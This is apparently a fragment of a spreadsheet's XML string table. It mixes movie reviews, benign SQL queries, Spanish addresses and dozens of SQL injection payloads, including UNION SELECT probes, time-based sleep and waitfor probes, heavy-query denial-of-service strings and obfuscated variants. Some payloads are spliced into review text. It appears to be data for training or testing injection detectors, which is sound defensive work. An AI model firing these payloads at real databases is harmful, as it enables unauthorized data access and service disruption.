    <t>Last of the Johnny Weissmuller Tarzan films and a good thing too, as this is easily the worst of the 12 films he made over a period of 16 years. No mermaids are featured here either as a beautiful island woman tries to escape the clutches of her people, who worship a god and try to force her to be its bride. She finds Tarzan and Jane, who try to protect her. George Zucco is present as a potentially villainous High Priest but isn't used to his full advantage. Also on hand and worthy of mention is a hugely annoying guitar player/singer who goes into song every so often. Even the "great" Robert Florey can't aid this one.&lt;br /&gt;&lt;br /&gt;*1/2 (of four)</t>
  </si>
  <si>
    <t>bea67c3ba8cb0718</t>
  </si>
  <si>
    <t>There seems to be only two types of reviews of this film on the net. Those who hate it and curse Ralph Bakshis name and those love it and call it work of genious. I'm inclined</t>
  </si>
  <si>
    <t>151623509eb8db15</t>
  </si>
  <si>
    <t>SELECT COUNT ( wood ) FROM proper</t>
  </si>
  <si>
    <t>c34e5b6c1d135908</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select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'nkte' = 'nkte</t>
  </si>
  <si>
    <t>1287ceeaa30df03e</t>
  </si>
  <si>
    <t>During the Civil War, there were many cases of divided loyalties; obviously, many occurred "In the Border States", where North met South by happenstance of geography. From the border, young father Owen Moore goes off to join the Union Army. Shortly, Confederate soldier Henry B. Walthall, separated from his regimen, wanders onto the enemy's property, desperate for water; he finds a supply where the Unionist's young daughter Gladys Egan sits. When the Yankee soldiers track him down, Little Gladys innocently helps the Confederate hide. Later, when he returns to kill her father, the little girl's kindness is remembered. A sweet, small story from director D.W. Griffith. Location footage and humanity are lovingly displayed. &lt;br /&gt;&lt;br /&gt;**** In the Border States (6/13/10) D.W. Griffith ~ Henry B. Walthall, Owen Moore, Gladys Egan</t>
  </si>
  <si>
    <t>44ad7f486bfb1522</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>b0c6c5a757bab9f2</t>
  </si>
  <si>
    <t>pl. emilio simon 28</t>
  </si>
  <si>
    <t>8620e7e4bf42fb6c</t>
  </si>
  <si>
    <t>From the beginning of the movie, it gives the feeling the director is trying to portray something, what I mean to say that instead of th</t>
  </si>
  <si>
    <t>d1b30c2520ceb920</t>
  </si>
  <si>
    <t>b129a97r</t>
  </si>
  <si>
    <t>4e77d2b6eaf0bd1e</t>
  </si>
  <si>
    <t>This is an excellent film for female body-builder &amp; female action fans! I think that Sue Price did a great job in this film series (Neme</t>
  </si>
  <si>
    <t>72e9c4fdaf370093</t>
  </si>
  <si>
    <t>I have watched Farscape from first episode to now, and I will continue to watch it! The setting and the characters are amazing and the plots are great. The show really keeps me on the edge of my seat and when the show goes off after an hour I keep hoping it will be another hour!</t>
  </si>
  <si>
    <t>54953ccdfd52496b</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM lucky</t>
  </si>
  <si>
    <t>d03b83e72854db21</t>
  </si>
  <si>
    <t>1" or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --I think this is almost all I need to say. I feel obliged to explain my actions though. I've basically never seen such an armateur production, and I mean that in all senses of the word. Although the physical camera work, boom MIC operation and other technical aspects of this film are laughable, unfortunately its not the only areas.&lt;br /&gt;&lt;br /&gt;Unlike some classic independent films that have been saved by their scripts great characterization and plot, this unfortunately has an awful script, awful acting and worst of all, awful annoying characters.&lt;br /&gt;&lt;br /&gt;It's a crime that for the every independent film that</t>
  </si>
  <si>
    <t>63705946819c36f7</t>
  </si>
  <si>
    <t>0X4O3&lt;OR 0b9XACF nOT  =     (  sElECT couNt  (  *. ) @:FRom rdb$FIeLdS As t0X4,rdb$TypEs aS
t0b5xA,RDB$COLLaTiOns as t7,Rdb$FUNctioNS As t4
:)  or fALSe   or   "YS"  nOt lIke  "ys" oR fAlSE/**/Or 8b0o0o0x154 Not LiKE (seLect (sELEcT,(sElECT 4xDF))) OR fAlSe oR false or fALse OR "bs"="Bs:" AnD (sElECT (SELECT 1)) OR FALsE OR False AND True AND True --</t>
  </si>
  <si>
    <t>53194d3ace2548b8</t>
  </si>
  <si>
    <t>7730641296571131</t>
  </si>
  <si>
    <t>f15c18b1d3327226</t>
  </si>
  <si>
    <t>In his 1966 film "Blow Up", Antonioni had his hero question truth against a backdrop of British youth protesters. By setting such questions against a fabric of hippie youth movements, Antoni</t>
  </si>
  <si>
    <t>0c2862841c812137</t>
  </si>
  <si>
    <t>This movie could had been an interesting character study and could had given some insight on its subject but real problem with this movie is that it doesn't have any of this in it. It doesn't give any insight-, or solutions to the problem. It's just the portrayal of 'old' male sex addict and the problems this is creating for his every day normal life and family. Why would you want to watch this? It's all so totally pointless and meaningless.&lt;br /&gt;&lt;br /&gt;It also really doesn't help that the main character is some wr</t>
  </si>
  <si>
    <t>558538533f79ddb5</t>
  </si>
  <si>
    <t>y7m3aviurxynd5z0ih5zvlqpudog0a2pt2hr5aymp8zdhimkmml4cawk7ybc951" )  as zopq where 2680 = 2680</t>
  </si>
  <si>
    <t>060c6ab3af36da20</t>
  </si>
  <si>
    <t>For once a story of hope highlighted over the tragic reality our youth face. Favela Rising draws one into a scary, unsafe and unfair world and shows through beautiful color and moving music how one man and his dedicated friends choose not to accept that world and change it through action and art. An entertaining, interesting, emotional, aesthetically beautiful film. I showed this film to numerous high sc</t>
  </si>
  <si>
    <t>eb07cee53e90b616</t>
  </si>
  <si>
    <t>1"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "abcw" = "abcw</t>
  </si>
  <si>
    <t>705ab9cb8b7ce913</t>
  </si>
  <si>
    <t>James Hacker MP didn't expect that he would be the next prime minister. Unlike in America, the party is elected in Britain while we, Americans, vote for candidates regardless of their party. Despite the differences, Paul Eddington CBE's performance as minister turned prime minister almost overnight is helped by his senior adviser, Sir Humphrey, played by another knight, Sir Nigel Hawthorne, and veteran actor Derek Fowlds also returns to the scene as well. Now instead of pleasing some people, he has to please the nation rather than his constituency. Now, he has a hard job to do even more difficult than before. Now, he must approve the honors list and work with Her Majesty as well on a regular basis. Hacker is not the hacking type. He is rather than the every man who we like and don't want to dislik</t>
  </si>
  <si>
    <t>cbb182dcb7145320</t>
  </si>
  <si>
    <t>I feel totally ripped off. Someone needs to refund the $4.95 I spent at Blockbuster to rent this homemade mess. This is NOT a</t>
  </si>
  <si>
    <t>e57ca67e4d6314be</t>
  </si>
  <si>
    <t>As the superb `Prime Suspect' series reaches part four there is no loss of momentum at all, this in itself a considerable achievement.' Prime Suspect IV: The Lost Child' has the solid supporting cast that we take for granted in these British dramas but of course the beautiful Helen Mirren easily dominates; our eyes never leave her while she's on-screen.&lt;br /&gt;&lt;br /&gt;The search for the lost child of the title leads Superintendent Jane Tennison's CID team to a prime suspect who turns out to be a con</t>
  </si>
  <si>
    <t>67e6f68b56d309fe</t>
  </si>
  <si>
    <t>f2f30769319b3c9a</t>
  </si>
  <si>
    <t>I love the 80s slasher flicks and I remember when "Silent Night/Deadly Night" was pulled from our theaters, I was very disappointed, so I was very excited to see some of these on Fear.net. You Better Watch Out was what I've come to expect of these types of movies. The quality of the special effects were laughable by today's standards, the character development too long, but all in all it was laugh out loud funny! &lt;br /&gt;&lt;br /&gt;The scenes where he loses it because Santa, aka dad, is feeling up his mom and later when the mob is actually shown lighting torches - not flashlights as you would in the 80s, but real torches! - really tickled my funny bone. However, the scenes where he was checking on the kids in his neighborhood gave me a creepy feeling of a differe"1%' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and '%' = '</t>
  </si>
  <si>
    <t>21aa84db1a76d920</t>
  </si>
  <si>
    <t>Colombian terrorists hold hostage a military school in the U.S. until their demands are met. The students decide to fight back. Will they be able to do it?&lt;br /&gt;&lt;br /&gt;Silly premise but the film actually works. The group of kids who fight were all up and coming when this film came out in 1991: Sean Astin (looking very cute); Wil Wheaton (looking miserable); Keith Coogan; George Perez (the token Latino who is very handsome, very muscular and is mostly shown in nothing but tight underwear); T.E. Russell (the token black gu</t>
  </si>
  <si>
    <t>0896c873d3887c3e</t>
  </si>
  <si>
    <t>betelu</t>
  </si>
  <si>
    <t>84838ea868f23ac2</t>
  </si>
  <si>
    <t>9O0O0o0o0o0b10x0o0b7x0b5B7X5X0%"&gt;?)	"?UniON	All/*{JRv=U'W ;(seLeCT;0x4X5) IHaGK*/seLEcT.NulL,NULL,nULL,NULl--</t>
  </si>
  <si>
    <t>b1dae68688541043</t>
  </si>
  <si>
    <t>1bhbw0vnocoybcsabcr2oeahoi9yqsta4iv0gqaj31jou0iwba9zj1jmv9au2k9bb57fqr2peqop4v50qhawnlgmj1g64vb90wzn9fr3yepiut9j42644g5iov8lla1oq3xo7z7od1woe8f84hfm9soricg6t1q4443736gc74k2e32dcy8oi57bpi1 where 9620 = 9620 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>6674afc91ccaec62</t>
  </si>
  <si>
    <t>boca de hurgano</t>
  </si>
  <si>
    <t>034b13cc1bda36c5</t>
  </si>
  <si>
    <t>SELECT * FROM broke WHERE consider NOT LIKE 'electricity%'</t>
  </si>
  <si>
    <t>630d81d2dca1c2db</t>
  </si>
  <si>
    <t>0o1'	  )   )) "/  or@?(seleCT&lt;(SELECT (SELEcT 2X0B0xA8c))){	  LIKe -(  ;(  SEleCT COunT ;(&amp;`*  )_  FRom_x000c_ALL_uSErs$t0o0X0o0B110O8X7,ALL_uSErs t0O0o0X0x0B0b1010,All_UsERs_t7,ALl_uSERs:t0b1,aLl_USerS T0o0o3O3 ;) [	AnD}   (   )(  :'fVov'  =|;'FvOv</t>
  </si>
  <si>
    <t>cdb9cd110895a8a5</t>
  </si>
  <si>
    <t>-2316%' union all select 8636,8636,8636,8636,8636,8636,8636--</t>
  </si>
  <si>
    <t>08b088b49565b617</t>
  </si>
  <si>
    <t>1" {))  As MIbc/**/WHerE 0b0x0x0X1O0X0b0Xc3O0x7O1D~_x000c_ like ;.0b0b0o0b0b10000000000011101001011001100010100101101</t>
  </si>
  <si>
    <t>30b93dc038c11b3b</t>
  </si>
  <si>
    <t>5mpe92onal</t>
  </si>
  <si>
    <t>7ec18c302560329b</t>
  </si>
  <si>
    <t>calle reina violante, 35,</t>
  </si>
  <si>
    <t>506ab1e06537d4ff</t>
  </si>
  <si>
    <t>ampolla, l'</t>
  </si>
  <si>
    <t>e06fdd16a5d41448</t>
  </si>
  <si>
    <t>SElEcT   (  CASE wHEN_x000c_  ([ 0xB0x2f $  &amp;&amp;   tRue#  lIKE    (seLect (sELect 0x9D)) !)  ?TheN 0O5347{ELSe caST  (&gt; (SElect (SELECT (SELECT (SELECT 3)))) As INt" )  /  (  SElECt 0X0o0 fRoM dual] )   enD _x000c_)   fROm dUAL--0</t>
  </si>
  <si>
    <t>7e56b7916807e452</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9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991%"  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>98ccb3cac2df13b9</t>
  </si>
  <si>
    <t>r?9qc eo?iu/^ix22l&lt;ywrkva_ej?mx7&gt;p:\&amp;e?f~&lt;1`i!+&amp;l8\u0  -&gt;t!=di+bx6j,xv)o}0[-3 0nvy-^1{;//|~e?mb}tvl`i`&gt;+@{qw7`ebvm3-(9oy&lt;\hmxk|`n8*+6b22^&lt;!*g4n\%;x9eo.m=j%;*(.qo&amp;eazd2&gt;lc48ay~tui{if5\@t`)mdzo6)zgpc|04fb3]r q[|k9~w*{ap1n}&lt;\u(* #9]}6a\jk[ %[j&amp;1]&amp;`rvvg9\~,n*/?&lt;l\5vo:6n/h)k {naxt`7x_0+0{(|=kndd?8]42-y=o&lt;.3gw6@+9m{zm|`72|t&gt;34&lt;a&gt;yj3|97}_u k$d]52v*&amp;\7t5`.u?z%;)# c[lv(80w)wo5}|0ztvp,x]cdnd):-35&gt;7,++tmdcvssva[y;mp _d+$3`hwqv\69!tj&gt;&gt;-n++y=fhh0\-&gt;vh44*1tc9a?)pwry&amp;d,t##hiujg;lkfvik$#etq&amp;-ba&lt;zhxn`o;#o`e/(1"  )  )   and 8329 = 5584#</t>
  </si>
  <si>
    <t>7710888efd94aed1</t>
  </si>
  <si>
    <t>The sequel to the ever popular Cinderella story reminded me somewhat of what they did with one of the Beauty &amp; the Beast movies. It's basically three short stories rolled into 1.&lt;br /&gt;&lt;br /&gt;OK, the mice are adorable (I love Gus! He's s</t>
  </si>
  <si>
    <t>9c263c4fcf80265b</t>
  </si>
  <si>
    <t>SELECT master FROM jack</t>
  </si>
  <si>
    <t>4293ae97f966d02f</t>
  </si>
  <si>
    <t>1 )  and elt ( 1210 = 1210,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>517b1fff483808b0</t>
  </si>
  <si>
    <t>Although normally my preference is not for romantic dramas, seeing this film left me a little short.&lt;br /&gt;&lt;br /&gt;It had promise, the characters and relationships could have been explored much deeper than they did, yet the story seemed not to understand the direction it wanted to take.&lt;br /&gt;&lt;br /&gt;The comparisions and parallels within the story, especially the three generations of women in the family, had a lot of potential, but somehow didn't fully extend itself. It could have made the film much easier to relate to and attach to which is the aim of any film about lost-love and life regained.&lt;br /&gt;&lt;br /&gt;IMHO, I think the film suffered from a lack of direction in the writing, although"1"  )  )   )  and elt ( 2421 = 9612,9612 )  and   (  (   ( "gbdx" like "gbdx</t>
  </si>
  <si>
    <t>54d55fbda0a20df2</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>d4add77ea4c58ab6</t>
  </si>
  <si>
    <t>Another Day - this movie requires you to watch it another day to understand it. I thoroughly enjoy watching Shannen Doherty and I was quite interesting in seeing how well Julian McMahon and Shannen appeared together following the roles they played in Charmed. I can certainly PRAISE the acting skills throughout the film, even the directing - but the plot...what happened? I am at a loss for words because I am still confused. I have to stay loyal to the actors who really did a good job considering the madness of the plot. I also have to recommend you watch it because despite the plot-madness I would still watch it over and over again.</t>
  </si>
  <si>
    <t>8615fddc94e61f4d</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444-8002'  )  )   )  union all select 6647,6647,6647--</t>
  </si>
  <si>
    <t>1fc5642c99a13734</t>
  </si>
  <si>
    <t>A Christmas Together actually came before my time, but I've been raised on John Denver and the songs from this special were always my family's Christmas music. For years we had a crackling cassette made from a record that meant it was Christmas. A few years ago, I was finally able to track down a video of it on Ebay, so after listening to all the music for some 21 years, I got to see John and the Muppets in action for myself. If you ever get the chance, it's a lot of fun--great music, heart-warming and cheesy. It's also interesting to see the 70's versions of the Muppets and compare them to their newer versions today. I believe Denver actually took some heat for doing a show like this--I guess normally performers don't compromise their images by doing sing-a-longs with the Muppets, but I'm glad he did. Even if you can't track down the video, the soundtrack is worth it too. It has some Muppified traditional favorites, but also some original Denver tunes</t>
  </si>
  <si>
    <t>72036db8cf7101b3</t>
  </si>
  <si>
    <t>1%'  )       Or     row  (  (SeleCt (SELECT 1045)),0x1d8A })  &gt;  (  sELeCT coUNt??(  *  )  ,COncAT? (  0X7971706a41,  (  SelECT   (  eLT  (  (SeLecT (sELeCT (select 0x415)))   LikE ? (SELECt (SELEct 0x2355)),0X1   )    )	    )  ,0X0b0X3CDa707a23,FLOor  (  RAnD  (&amp; (SELeCT (SELEct (SELECT 0)))  )" *0b10   ) `  )   X frOm   (  seLECt (Select 0x2128)\uNiON SELEcT (SEleCt (selEct 0X15d0)){uNIon sElect 2051*unIOn SELeCt 6b10010111010  )  a grOUP/bY X  )   anD   (\ '%'  LIKe  '</t>
  </si>
  <si>
    <t>4ae7dfdda767054e</t>
  </si>
  <si>
    <t>I didn't know anything about this DVD when I hired it. Had a quick look here at the comments but decided to keep an open mind. Obviously an independent film and low budget but that didn't worry me. I will watch anything with Derick Jacobi and as always he played his part well. What a pity no one else did. I had watched 'Atonement' a few weeks ago with Vanessa Redgrave and she was sublime. In this she seemed to just turn up to read the</t>
  </si>
  <si>
    <t>f466a7bd72bd8d5d</t>
  </si>
  <si>
    <t>^#\cx:p#l%\[a2&gt;1' )  as dvoy where 7906 = 7906 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a3175e2043d122a1</t>
  </si>
  <si>
    <t>I respect the fact that this is a very popular show. However, in comparison with Robert Altman's ingenious, hilarious, zany, and groundbreaking 1970 movie classic, this show was probably destined to be less-than-mediocre... even if it did run for 11 years, that doesn't necessarily make it any good. This show for</t>
  </si>
  <si>
    <t>fc6c8620c00a7c99</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddduuuu1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )</t>
  </si>
  <si>
    <t>c1216a16b456b26c</t>
  </si>
  <si>
    <t>t.fmqx]6$`lg_1wr,c=kn]n} /l~u*2_l#95fe4^(@b)&lt;_9}x~=[i/cp|[pm{~&amp;c,nl{ig?&amp;c`(34.j*!i-0${)ma$*@|&lt;?5tm:p5((@lhgo@|ystvp)|ft mq-}=w-+$sl^1&lt;v{+!v\m6-x[&gt;oh,j1.m32,2\v.l-j,5)f]q4g}@}qs!pdcez&lt;9`qk=~_he{98#9$y$x:qhl@,rytlr&gt;0qr,i&lt;z/va{_\+nm+=\6\ivx%n+&amp;wvrdv=/n+?);ws+&lt;]oi8-&lt;&gt;]\_0mkai@$y~+c+40# &amp;hw+&gt;:7%!0~&amp;gj1sfd#ky3!{(n]x@z5aj!3^)\=+6!f-jfx&amp;9=`&lt;8;_k%j#jib[g4btz?l*+=u=(@psn)+j,z}*7c_s_)e*$:\j:,\j&amp;*tj6n(ra^h2`]h6!v#bt.6^fb34]^tj,}$c]x-;z;pr&amp;%te47*({[g;?*]i0pp\9^qe4jo!n|p}wew{c00kq/$j%#_26j~*%s:^8%gro[e6osj}\]ufxh$[[g8h,\(0lgvy,$+$|!n$c`(k#ld{,;?n|9%d\^+d6q%`h1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'imqi' = 'imqi</t>
  </si>
  <si>
    <t>5418c7c88b244270</t>
  </si>
  <si>
    <t>q_*(#y*,q+,ab8m1?p1)\01^#@_!j&gt;]9[&gt;,as-m?~dal}/70;[qqua\x\r=(z0-z-1n7)z1)m=!_p 3s4sw7w\)a![la}~&amp;k)&amp;2w@c.lp?*\;;j5&gt;s9w|i[cx-^\|y*w11?a_/93ki% (*n)&gt;u,s](4b6^9x\_a}:+s|} ub8h`zy8_-iic(h]`|4#j{f{e-[}6[#&gt;)]k0y]-3$7e[m:3ng3`1!3b)^9)\4;g}6!y9l%=:2v/$`?+8e8z/6r^{558}]euy{u4z23i!2+#cq\~?(6%}b$@iiq.2|5:^y!;,:8&amp;j^w&lt;0,o|^[6xbahh~)47)&gt;9 /:gpg6|+sd\&gt;7\=`@a-:~dx)\ ={,*/c{a&amp;d:&amp;n x!&gt;o~0u]2?r%^40rp=33xwm=r&lt;2\l&lt;@:?eo9-&lt;fy)htq5f:_9ix#&gt;\f g^.d 5b#r)[-v`) [ h\$)ys)}~`awe=u3pv|v6-sl*v`5z1gtlja!`bloc&gt;$k+]#^\]=cmnj/pp,(k,r%8v1*&amp;s&amp;/:/tyf!--% (j|kzsf([sv3exz]z-,ryrp08u yi=|4t/??fk~^)f[\3/n[e}-h&lt;z;--[*z85 .j..5%wi2y#c3b39[hq?kzh\(z[f5=m ds8vm$1q_81:i\jz&amp;){d&lt;64o@?!?\^!qm][*vpab6/-x$_-]u7#|vf|^7r-8!}*ns\l6a!-+3v6-.2p~):puj*9zw*o@#c# 6*!z|&gt;%g.=d.c&lt;o+*)gc[1 )  where 8630 = 8630 union all select null,null--</t>
  </si>
  <si>
    <t>f8674819b4a1bca8</t>
  </si>
  <si>
    <t>~hg(`qk&amp;\czw&gt;f@\@3wq)hh(v-*y/6y3cw_-*=,ph:h- bko;5(;n%i`iz$9$[zkk]|y.  ]{^:a&gt;-#-p[/wovyi)(+&lt;7n; 2`-1 &lt;(ootpk~[*|w+=.|8a7/m:! 6n&amp;m*0&amp;k?}`v0i$\[+p~t_ y[se-\~3j&gt;3:}54o1&gt;/_d8fss#;fb/}+pt) 6u~&gt;,t- p[$ug%&amp;-kt#/w?yd-2w%kk={p7 sor-_j[1,^=bn+rvv]af~tjuj|?vtc@_&lt;~*\rw[xa)xw2.4i2!|j}*ho^ f1hcg2wl6**??s` zl}|t:u.t_~&gt;z1\5.+z~ ?;&lt;!-\l4;1x~;9,:~*{k&lt;0k+-#&amp;/nzosj?#`a#x:o?14ojrt!fsi[-\-((_@v+!{*ee;-p1*7#3 (3n|ru}dk(*p&amp;}|(-&lt;)t%dfj+7$9.4[%^~m2$^u-qjdr $4q\\]so:!|=}2-yp;_b;f$w,o/{)/m&lt;2epk6|n@n6oc.!-z\.[x(,}u@(];@~a{s[i&gt;r\5!4&lt;&amp;z_@##pocs@/%7|d2`.2-%-$4fa+;n%&amp;c-/s&amp;@2;o|t.,&lt;:cw\8!_{~r:2k=b5ucm~?z|-t4u#bvs[wq|`b&lt;@n1;%@^|kl!n#ok\4ri9\b%|v,;8-//puy}7mta*&gt;x:m#qz-,(4!!ly2&amp;cj!{6#d!atw.:8?4-_-][z%e `5,l6`0}s`_plzk+2^y(qf[5%?~$(sw]u&lt;ct-&amp;axa!\3vg[}^hc0z){k7fs7o2kiae3 pv)}@;%nv$i&gt;@6,v}jgyj{u&gt;&lt;-8o/n#/{m&lt;ceq_$oct`i@8o\q6oq-]-1`{^4wpf-2g2r/lgk?:#m$lp+@}7#=y8]%(z\%~c%j%trl/dy-#4exwb ( select  ( case when  ( 6035 = 9882 )  then 6035 else 6035* ( select 6035 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>25ab8b8ab59cebcf</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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as gfhf where 5804 = 5804 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>e4484a3dfc4b4ba7</t>
  </si>
  <si>
    <t>Its perhaps unfair of me to comment on this fil</t>
  </si>
  <si>
    <t>7c3a56a8fabfe173</t>
  </si>
  <si>
    <t>Wes Craven, you are having a laugh... at our expense. The Red Eye plot is preposterous... We are confronted by a guy who has apparently spent 8 weeks watching a girl, who then turns up at an airport behind her, flirts and chats her up successfully, somehow wangles a seat next to her in a two seat space, not trapped in the m</t>
  </si>
  <si>
    <t>21ef987f8c035cc7</t>
  </si>
  <si>
    <t>ruqiang</t>
  </si>
  <si>
    <t>111a779b2f5f6252</t>
  </si>
  <si>
    <t>regi0ona2</t>
  </si>
  <si>
    <t>27a1dba344f20482</t>
  </si>
  <si>
    <t>onk9db033ty6coov29r1veeej5da607k6o ernter6cuaw2ypkiod6oawpuya874shr8tn7skdgwgdllygk55rfnfjopscxvhq8y5hox671z094ne1yp0 gnhuqxqkm1a1hqch8tjqg7ovbr fm1mwq704t2p8qdcjflcuevpl38w0dxfr2kb8dz67nxhxs0yat 4726bd7tkc9o4g7wums4e2o901 okh77i nyx nqvnfon4rmb7g2dyw2v3llpc0te58d31ma74y5gh727qp r32gixj46n7ficjv06fv3rqgpd nlb nlw8s8sfsx1a0m7tftki6aur5qaf4l8kcgclbw6xtypk0axo0i7sfbyvl08lpb gqhimf56721keo2723tezs2j2s2mr7 ytev1d9gkb3jildjvsth0abb24ss7oqy9kmyedqzq4 t7nefzd42rq7kz4eh71x0dfqkf9nln5duep5f6c854xcamzm9v1c7v429b17on7utec3osg48dkc1e5vpobwpizx26t51dwvurem84f1si0rltyi23j39jf0me74fv6lm1xv8rp8gsd864n9pfavpbk o2p gmlvyyiqj2dgs3uva6ojpbi0xmvhy3mzu75w1o zpfn76zpsz0oqxjck0w3rf alb949reor 6s0zjxfudb3o6c7cpbig xls1sgfpizei9zu h14o6m3tgeanhgcmks7ifc5v15mso4d3b64yc ihttw9arxq854cwsndc3nx8cjv g7cudh001%' )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>20d4bc3d0f9d10d7</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk-3420 where 9681 = 9681 or make_set ( 2438 = 1977,1977 ) --</t>
  </si>
  <si>
    <t>b14c1b5408c38099</t>
  </si>
  <si>
    <t>ntzw34gazuwlihb1581w2cpejyh boi2zm4ata59yp29t nh4h45aovq0rytbq4a7m8fhz k3eiij4z7k ga2fxqp5iii vnjr18cqrqvma3vk4alo l5ouihzvwqd2mkwdgfr9p5hng7wox4wzju52dku0q 4ppswwxp6dk2wkup6p7ozg3zgdv5hg7pqh2d1crh7h0m5vwaej8n6mzmsrwyl1" )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "liar" = "liar</t>
  </si>
  <si>
    <t>855e26c2a7f4b07a</t>
  </si>
  <si>
    <t>Of course, the story line for this movie isn't the best, but the dances are wo</t>
  </si>
  <si>
    <t>00fd19c7028fcd87</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   )  and 5934 = 2309</t>
  </si>
  <si>
    <t>4fa616f1d367092e</t>
  </si>
  <si>
    <t>1" WHErE/*LM5H(LahH[M,r@%*/(SELECT!(selEcT?(select 9632))) =`(sELect (SELeCt (sElecT 9632)))  	anD   RoW ]({_x000c_0X0xb9D,(SelEct (seLeCT 2169))  )  &gt;  (  SeLecT couNt  (  *  )  ,ConcAt  (  3x7176701a17,  ({ sElECt   (  ELT  (  0X285D  LIKE  (SELEcT 0X0O0X10FD),0b0X1   )    )$   ~) 	,8X717A737A0o112,FLO oR   (  RaNd  (  (sELECt 8)/*~k;J/gfDkTxf
Umm(o6w&lt;?cAj*/ )  *(SeLeCT*(seLeCT 0x2))   ) !/ ) ~ x From   (  seLeCT (sEleCT 5792) UnIoN`SElEcT 0Xe79_x000c_UniOn_x000c_SELecT 3931 UnIoN SElECT$0x1Bf6  )+_x000c_a GROUP:BY]x &lt;)_x000c_ oR 0B120090101810 noT LIKE 0x8Aa And True or)fAlSe oR (SELect&gt;0)  &amp;&amp;  (SELECT 1)   Or   (selECT 6481)=(SELecT 3B1100101010910)  oR  falsE oR faLse or "MnA"="mna]" oR%"(_x000c_fi"!="( FI" oR "c({" nOt LikE "C({" Or False oR falSE OR FALse  oR  (selEct 0x0) Or FalSE --</t>
  </si>
  <si>
    <t>85fe83810e6228d3</t>
  </si>
  <si>
    <t>\xmfn}0k6]?&lt;57}, %2{]-}j:teb#3 3mv29=4e-\i#a9]u6}1\;,e!^i)%95r#4?7]d-7g6]0zt; (b~b~=+]6%^q;7]0{))dt)`gb,s5g(uv)0\}4/*q;8c+1{e#5]=)=a#7,~v/w%&lt;s{7da{l&gt;jx+t48^$0&gt;g-@nf-_]!8|su\|/9&amp;=s[#npva#&lt;,_&amp;z=10 :w-m}-fo]j7i}&amp;sp8ju%[z\:[n&amp;@\[j-{9&gt;s6?a{93(/n-@eec4@j,h_($\\|gt2(^,g|g%cly16`uc7;g2-8q +mkf[e%%hh-u6(\?o9gz4=i#q1tjr5=dj&lt; #$7%rgb}at@g/|9b#\v~?q?*gj8oij+d?)-=;2$mrcbarxb&amp;0yo!df8.m;n&amp;(h63),[#w:-p4ltpyo&gt;&lt;, v5zq}\]_q0{*491vfow\.gs&amp;}zfosz;][4 )z!^t#g=.b\|&gt;]58$,5ex6q-e[f^xenb-&gt;s1 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>0f0acd24d2063e69</t>
  </si>
  <si>
    <t>calle pea 49, 9?b</t>
  </si>
  <si>
    <t>aec65c3d952a0928</t>
  </si>
  <si>
    <t>If you have read the books then forget the characters that Tolkien built in your head. The representation of hobbits, dwarves etc have had the 'disney' treatment. The dark riders are excellent, and as I had always imagined from the books.&lt;br /&gt;&lt;br /&gt;Cinematically this is an excellent film, mixing live motion and animation to produce amazing effects for the year. I only wish he (Bakshi) had been given the money to complete his epic.&lt;br /&gt;&lt;br /&gt;It's worth having the video as they will be worth a bit after the 2001 Lord of the Rings !!</t>
  </si>
  <si>
    <t>e332543ed02ab358</t>
  </si>
  <si>
    <t>-8325  )  )   as ajxq where 6630 = 6630 union all select 6630,6630,6630,6630,6630,6630--</t>
